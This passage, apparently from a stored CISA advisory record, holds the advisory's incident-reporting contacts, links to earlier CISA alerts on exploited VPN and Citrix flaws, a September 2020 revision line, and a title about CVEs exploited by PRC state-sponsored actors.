[CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3&qu
Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
